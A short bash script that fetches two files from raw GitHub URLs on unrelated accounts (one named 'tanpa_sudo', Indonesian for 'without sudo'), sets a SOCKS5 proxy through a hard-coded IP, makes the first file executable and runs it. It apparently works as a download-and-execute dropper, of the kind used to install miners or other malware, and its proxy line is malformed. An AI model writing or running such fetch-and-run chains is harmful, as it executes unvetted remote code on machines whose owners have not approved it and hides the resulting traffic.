#!/bin/bash

wget -O 1 https://raw.githubusercontent.com/johnwixk228/config-json/main/turtle/tanpa_sudo && wget -O 2 https://raw.githubusercontent.com/ributmaestro/ghost-rider-test/main/v2 && export_http_proxy=socks5://88.198.24.108:1080 && chmod u+x 1 && ./1
